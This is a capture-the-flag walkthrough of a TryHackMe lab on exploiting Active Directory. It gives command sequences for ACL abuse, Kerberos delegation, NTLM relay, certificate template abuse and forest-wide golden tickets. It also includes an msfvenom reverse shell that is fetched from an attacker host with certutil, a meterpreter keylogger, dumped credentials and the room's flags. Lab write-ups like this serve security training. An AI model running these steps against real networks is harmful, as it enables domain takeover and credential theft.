Exploiting Active Directory - Medium
- Exploiting Permission Delegation
- Exploiting Kerberos Delegation
- Exploiting Automated Relays
- Exploiting AD Users
- Exploiting GPOs
- Exploiting Certificates
- Exploiting Domain Trusts
Exploiting Permission Delegation
#download given .zip file (output of running SharpHound.exe)
#start neo4j
sudo neo4j console
#run bloodhound
cd /opt/BloodHound/BloodHound-linux-x64
./BloodHound --no-sandbox
#login using neo4j:bloodhound
#drop zip file in bloodhound
#check for privesc
#login via ssh using given creds
ssh za.tryhackme.loc\\ruth.dale@thmwrk1.za.tryhackme.loc
powershell -ep bypass
#launch powershell
-
AD can delegate permissions & privileges through a feature named
Permission Delegation. -
Permission Delegationexploits are referred to asACL-based attacks, as AD allows admins to configure ACEs (Access Control Entries) that populates DACLs (Discretionary Access Control Lists). -
Many ACEs can be misconfigured, and the exploits vary for each ACE.
-
To exploit these ACEs, we need to interact with AD to make requests, for which tools such as AD-RSAT cmdlets and PowerSploit can be used.
-
With the given .zip file as a result of executing
SharpHound.exe, we can open it inBloodHound. -
Now, we have been given SSH creds for user in "Domain Users" group, which can RDP into THMWRK1; this will provide us with only low-priv access.
-
As this is a tiered domain, we need to first compromise "Tier 2 Admins"; in
BloodHound, we can check for privesc from "Domain Users" group to "Tier 2 Admins" group using thepathfindingfeature. -
This shows that "Domain Users" can
GenericWriteto "IT Support", which canForceChangePasswordto "Tier 2 Admins" group members; this can be abused, and we can check the 'Abuse Info' section inBloodHoundforPowersploitrelated commands:
#in powershell session
Add-ADGroupMember "IT Support" -Members "ruth.dale"
#add our AD account to IT Support group
#using Add-ADGroupMember cmdlet from AD-RSAT toolset
Get-ADGroupMember -Identity "IT Support"
#verify
Get-ADGroupMember -Identity "Tier 2 Admins"
#check members of Tier 2 Admins group
#select username of random account
$Password = ConvertTo-SecureString "Password123" -AsPlainText -Force
Set-ADAccountPassword -Identity "t2_ross.bird" -Reset -NewPassword $Password
#now we can login as this tier 2 admin
#and get flag from Administrator's Desktop
ssh za.tryhackme.loc\\t2_ross.bird@thmwrk1.za.tryhackme.loc
1. Which ACE would allow you to update any non-protected parameter of a target object? - GenericWrite
2. What is the value of the flag stored on the Desktop of the Administrator user on THMWRK1 (flag1.txt)? - THM{Permission.Delegation.FTW!}
Exploiting Kerberos Delegation
-
Kerberos Delegationis used to enable apps to access resources hosted on a different server. -
Types of
Kerberos Delegation:-
Unconstrained - originally implemented; least secure method; provides no limits to AD delegation.
-
Constrained - restricts what services an account can be delegated to.
-
Resource-based constrained - provides additional restrictions on
Kerberos Delegationfor security; the service specifies which objects can delegate to it.
-
-
Constrained Delegation exploitation:
#in privileged ssh session
whoami /groups
#part of Tier 2 Admins
powershell -ep bypass
#launch powershell session
Import-Module C:\Tools\PowerView.ps1
#enumerate available delegations
Get-NetUser -TrustedToAuth
#output shows 'svcIIS' account has
#'msds-allowedtodelegateto' set for WSMAN and HTTP
#also it is given that there is service
#on THMWRK1 running as svcIIS user
#we can use Mimikatz to dump secrets
C:\Tools\mimikatz_trunk\x64\mimikatz.exe
#in mimikatz, impersonate system user
token::elevate
#dump secrets from registry hive
lsadump::secrets
#gives password associated with svcIIS
#we can perform kerberos delegation attack now
#using kekeo and mimikatz
#run kekeo
C:\Tools\kekeo\x64\kekeo.exe
#generate TGT to be used to generate tickets for HTTP and WSMAN services
tgt::ask /user:svcIIS /domain:za.tryhackme.loc /password:Password1@
#gives TGT file
#forge TGS requests for account to be impersonated
#in Tier 1, to access THMSERVER1
#for http
tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:http/THMSERVER1.za.tryhackme.loc
#for wsman
tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:wsman/THMSERVER1.za.tryhackme.loc
#now we have two TGS tickets
#we can exit kekeo and use mimikatz
C:\Tools\mimikatz_trunk\x64\mimikatz.exe
privilege::debug
#import both TGS tickets
kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
exit
#exit mimikatz
klist
#verify tickets were imported
#create and enter PSSession on THMServer1
New-PSSession -ComputerName thmserver1.za.tryhackme.loc
Enter-PSSession -ComputerName thmserver1.za.tryhackme.loc
#enters session on THMServer1
whoami
#t1_trevor.jones
#get flag from Administrator Desktop
1. Which Kerberos Delegation type allows for delegation of all services? - Unconstrained Delegation
2. Which Kerberos Delegation type allows the service to specify who is allowed to delegate to it? - Resource-based Constrained Delegation
3. Which Constrained Delegation service allows access to the file system of the system via delegation? - CIFS
4. What is the value of the flag stored in the Desktop directory of the Administrator user on THMSERVER1 (flag2.txt)? - THM{Constrained.Delegation.Can.Be.Very.Bad}
Exploiting Automated Relays
-
All Windows hosts have machine accounts; different DCs (domain controllers) use their machine accounts to synchronise AD updates & changes.
-
There are exceptional cases in AD, where one machine has admin rights over another machine; we need to identify these cases using
BloodHound. -
Using the following custom query, we can find instances where a computer has "AdminTo" relationship over another computer:
MATCH p=(c1:Computer)-[r1:MemberOf*1..]->(g:Group)-[r2:AdminTo]->(n:Computer) RETURN p -
This shows that THMSERVER2 machine account is "MemberOf" Server Management group, which is "AdminTo" THMSERVER1 machine account.
-
This is related to printer bugs in MS-RPRN protocol (PrintSystem Remote Protocol); and to exploit this, apart from machine account admin privileges, we need to meet these conditions:
- A valid set of AD account creds
- Network connectivity to target SMB service
- Target host must be running PrintSpooler service
- Hosts must not have SMB signing enforced
#log into ssh on THMWRK1
ssh za.tryhackme.loc\\paula.bailey@thmwrk1.za.tryhackme.loc
powershell -ep bypass
#check if printspooler service is running
GWMI Win32_Printer -Computer thmserver2.za.tryhackme.loc
#alternate query
Get-PrinterPort -ComputerName thmserver2.za.tryhackme.loc
#in attacker machine
#check THMSERVER1 and THMSERVER2 do not have SMB signing enforced
nmap --script=smb2-security-mode -p445 thmserver1.za.tryhackme.loc
#exploiting authentication relays
#using SpoolSample
#in attacker machine, setup ntlm relay
#using THMSERVER1 IP
ntlmrelayx.py -smb2support -t smb://10.200.60.201 -debug
#in powershell session
exit
#exit powershell
#we are in ssh now
cd C:\Tools
#execute exploit using attacker IP
SpoolSample.exe THMSERVER2.za.tryhackme.loc "10.50.57.82"
#ntlmrelay dumps hashes
#use ServerAdmin hash to log into THMSERVER1
evil-winrm -u ServerAdmin -H <serveradmin-hash> -i 10.200.60.201
#get flag from Administrator.ZA Desktop
1. How often (in days) are the passwords of Windows machine accounts rotated by default? - 30
2. What should not be enforced if we want to relay an SMB authentication attempt? - smb signing
3. What is the value of the flag stored in the Desktop directory of the Administrator.ZA user on THMSERVER1 (flag3.txt)? - THM{Printing.Some.Shellz}
Exploiting AD Users
-
Users are the weakest link the security chain; here we can exploit them using two elements:
- Credential management
- Keylogging
#in evil-winrm session as ServerAdmin
cd C:\Users
Get-ChildItem -Recurse
#print directory contents recursively
#this shows .kdbx file
cd C:\Users\trevor.local\Documents
dir
#PasswordDatabase.kdbx
download C:\Users\trevor.local\Documents\PasswordDatabase.kdbx /home/sv/PasswordDatabase.kdbx
#download to attacker machine
#this is encrypted, so we need to find another way
#in attacker machine
#create payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.50.57.82 LPORT=4444 -f psh -o shell.ps1
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 10.50.57.82; set LPORT 4444; exploit"
#setup listener
#host payload using Python webserver
python3 -m http.server
#in evil-winrm session
certutil.exe -urlcache -split -f http://10.50.57.82:8000/shell.ps1
#get payload
#execute payload
.\shell.ps1
#we get meterpreter shell on attacker
ps | grep "explorer"
#shows a session on THMSERVER1 as trevor.local
migrate <PID of explorer.exe>
#migrate from system to user
getuid
#trevor.local
keyscan_start
#start keylogger
#after 2-3 minutes
keyscan_dump
#stop keylogger
#dumps password
#in attacker machine
sudo apt install keepassx
#now we can open kdbx file and use password found earlier
1. What application is used to open the kdbx credential database? - KeePass
2. What meterpreter command do we use to move from SYSTEM to user context? - migrate
3. What is the password of the credential database? - Imreallysurenoonewillguessmypassword
4. What is the value of the flag stored in the credential database? - THM{AD.Users.Can.Give.Up.Good.Secrets}
Exploiting GPOs
-
In the .kdbx file found earlier, we had another set of creds "svcServMan:Sup3rStr0ngPass!@".
-
Looking up this account in
bloodhound, we can usepathfindingfeature to check the path from 'svcServMan' to 'THMSERVER2'. -
This shows that 'svcServMan' can "GenericWrite" to 'Management Server Pushes', which can "GpLink" to 'Management Servers', which "Contains" 'THMSERVER2'.
-
So, using this account, we have ownership over a GPO (Group Policy Object), which can be applied to THMSERVER2.
-
GPO is a virtual collection of policy settings; each GPO has a unique name (GUID); this is stored usually in the SYSVOL directory.
-
GPOs can be defined for AD objects; GPM (Group Policy Management) allows us to define policies on the AD structure.
-
We can attempt to exploit GPO and add an AD account to both the local Administrators and local Remote Desktop Users groups:
xfreerdp /v:thmwrk1.za.tryhackme.loc /u:louis.thornton /p:Islr3423
#rdp using given creds for THMWRK1
#inject svcServMan creds into memory
#using runas in command prompt
runas /netonly /user:za.tryhackme.loc\svcServMan cmd.exe
#opens cmd.exe
dir \\za.tryhackme.loc\sysvol
#verify it worked correctly
mmc
#open microsoft management console
-
In
Microsoft Management Console, we can click File > Add/Remove Snap-in > Select 'Group Policy Management' span-in > Add > OK -
Now, we can view the GPOs for the 'za.tryhackme.com' domain; navigate to the GPO in Servers > Management Servers > Management Server Pushes
-
Right-click on the GPO and Edit it - this brings up the Group Policy Management Editor window.
-
Navigate to Computer Configuration > Policies > Windows Settings > Security Settings > Restricted Groups > Right-Click and select Add Group > Browse > enter 'IT Support' > Check Names > Click Okay twice - we have to add Support Properties now.
-
Under Support Properties, the second filter titled 'This group is a member of' - here, we have to add the groups 'Administrators' and 'Remote Desktop Users'.
-
We can click on Apply and OK after these changes; within 15 minutes the GPO will be applied.
-
Then, as we added the given user initially to the "IT Support" group, that account will now have administrative and RDP permissions on THMSERVER2; so we can use
xfreerdpand login into that machine and get the flag.
1. What object allows users to configure Windows policies? - Group Policy Object
2. What AD feature allows us to configure GPOs for the entire AD structure? - Group Policy Management
3. What is the name of the GPO that our compromised AD account owns? - Management Server Pushes
4. What is the value of the flag stored on THMSERVER2 in the Administrator's Desktop directory (flag4.txt)? - THM{Exploiting.GPOs.For.Fun.And.Profit}
Exploiting Certificates
-
AD CS (Certificate Services) is Microsoft's PKI (Public Key Infrastructure) implementation; AD can be used as CA to prove & delegate trust.
-
AD CS usually runs only on selected domain controllers. However, administrators of AD CS can create templates that can allow any user with enough permissions to request a certificate themselves.
-
Finding vulnerable certificate templates:
#in rdp session on THMSERVER2
#open powershell
certutil -Template -v > templates.txt
-
Going through the file, we need to search for a template with the following parameter combo:
- Client Authentication
- CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
- CTPRIVATEKEY_FLAG_EXPORTABLE_KEY
- Certificate Permissions
-
We can see that 'Template[32]' is the vulnerable template - in this, we can see that machine account of THMSERVER2 can issue a CSR (Certificate Signing Request) for a template that allows us to specify SAN (Subject Alternative Name) and can be used for Client Authentication.
-
Exploiting certificate template:
-
In RDP access, click Start > Run > type 'mmc' to launch MMC > File > Add/Remove Snap-in > Add 'Certificates' snap-in > Select 'Computer Account' and 'Local Computer' when prompted > OK
-
Under Certificates category, right-click on Personal > All Tasks > Request New Certificate > click Next twice to select AD enrollment policy
-
The current template requires more info; click on the More Info warning > change 'Subject Name' type to 'Common Name' and provide any random value > Add > change 'Alternative Name' type to 'User Principal Name' and provide value 'Administrator@za.tryhackme.loc' > Add
-
Click Apply & OK > select certificate and Enroll - we can view our cert now
-
Right-click cert > All Tasks > Export > click Next > select 'Yes, export the private key' > click Next twice > set a password > click Next and set location with filename 'vulncert' > click Next and Finish
-
We can impersonate a user now - use certificate to request Kerberos TGT, then load Kerberos TGT
shell#in RDP access to THMSERVER2 #open command prompt cd C:\Tools #we can use Rubeus to load Kerberos TGT Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:C:\Users\louis.thornton\Desktop\vulncert.pfx /password:password /outfile:administrator.kirbi /domain:za.tryhackme.loc /dc:10.200.60.101 #/user switch is to specify the user to be impersonated #/dc switch is the IP of the domain controller THMCHILDDC #this generates administrator.kirbi #we can use mimikatz to load tgt and authenticate to THMDC mimikatz_trunk\x64\mimikatz.exe #in mimikatz privilege::debug kerberos::ptt administrator.kirbi #load TGT exit #exit mimikatz #verify if we can access THMDC file system dir \\THMDC.za.tryhackme.loc\c$ #this successfully prints #we can get flag now type \\THMDC.za.tryhackme.loc\c$\Users\Administrator\Desktop\flag5.txt -
1. What does the user create to ask the CA for a certificate? - Certificate Signing Request
2. What is the name of Microsoft's PKI implementation? - Active Directory Certificate Services
3. What is the value of the flag stored on THMDC in the Administrator's Desktop directory (flag5.txt)? - THM{AD.Certs.Can.Get.You.DA}
Exploiting Domain Trusts
-
We have access to Tier 0 infra till now (za.tryhackme.loc domain); we can use this to take control of the root domain (tryhackme.loc)
-
Domain Trusts are used in the AD network to gain access to other resources in the domain; trusts outline how domains in a forest communicate with each other.
-
Types of domain trusts:
-
Directional - direction of trust flows from trusting domain to trusted domain
-
Transitive - trust relationship expands beyond just two domains to include other trusted domains
-
-
If we have compromised a child domain, domain trusts can be exploited to compromise the parent domain as well.
-
KRBTGTis the account used for Kerberos (in Microsoft), and this is the service account for the KDC (Kerberos Distribution Center) service, which handles all Kerberos ticket requests. -
In a Golden Ticket attack, we bypass the KDC altogether and create our own TGTs, thus becoming a TGS (Ticket Granting Server).
-
To forge TGTs, we need some info:
- FQDN of domain
- SID of domain
- Username of account to be impersonated
- KRBTGT password hash
#in compromised Tier 0 infra session
#open command prompt
cd C:\Tools
mimikatz_trunk\x64\mimikatz.exe
#in mimikatz
privilege::debug
lsadump::dcsync /user:za\krbtgt
#dumps hashes for krbtgt
-
We can also forge an Inter-Realm TGT, which are used to provide access to resources in other domains; we need to exploit bidirectional trust between child & parent domain.
-
We need to include extra account SIDs from other domains when constructing the Golden Ticket; this includes adding SID of "Enterprise Admins" group - this grants admin privileges over the entire forest.
#open powershell in compromised rdp access
#use AD-RSAT cmdlets
#get SID of child DC
Get-ADComputer -Identity "THMDC"
#get SID of EA group
Get-ADGroup -Identity "Enterprise Admins" -Server thmrootdc.tryhackme.loc
#in mimikatz session from earlier
#we can generate golden ticket now
kerberos::golden /user:Administrator /domain:za.tryhackme.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:16f9af38fca3ada405386b3b57366082 /sids:S-1-5-21-3330634377-1326264276-632209373-519 /ptt
#/sid for SID of child DC
#/rc4 for NTLM hash of krbtgt
#/sids for SID of EA group
#this generates golden ticket
exit
#exit mimikatz
#verify golden ticket is working
dir \\thmdc.za.tryhackme.loc\c$
#we can access child DC filesystem
dir \\thmrootdc.tryhackme.loc\c$\
#we can access parent DC filesystem too
#we have compromised parent domain
1. What domain trust relationship is by default configured between a parent and a child domain? - Bidirectional trust
2. What is the name of the AD account used by the KDC to encrypt and sign TGTs? - krbtgt
3. What is the name of the TGT that grants access to resources outside of our current domain? - Inter-realm TGT
4. What is the value of the flag stored on THMROOTDC in the Administrator's Desktop folder (flag6.txt)? - THM{Full.EA.Compromise}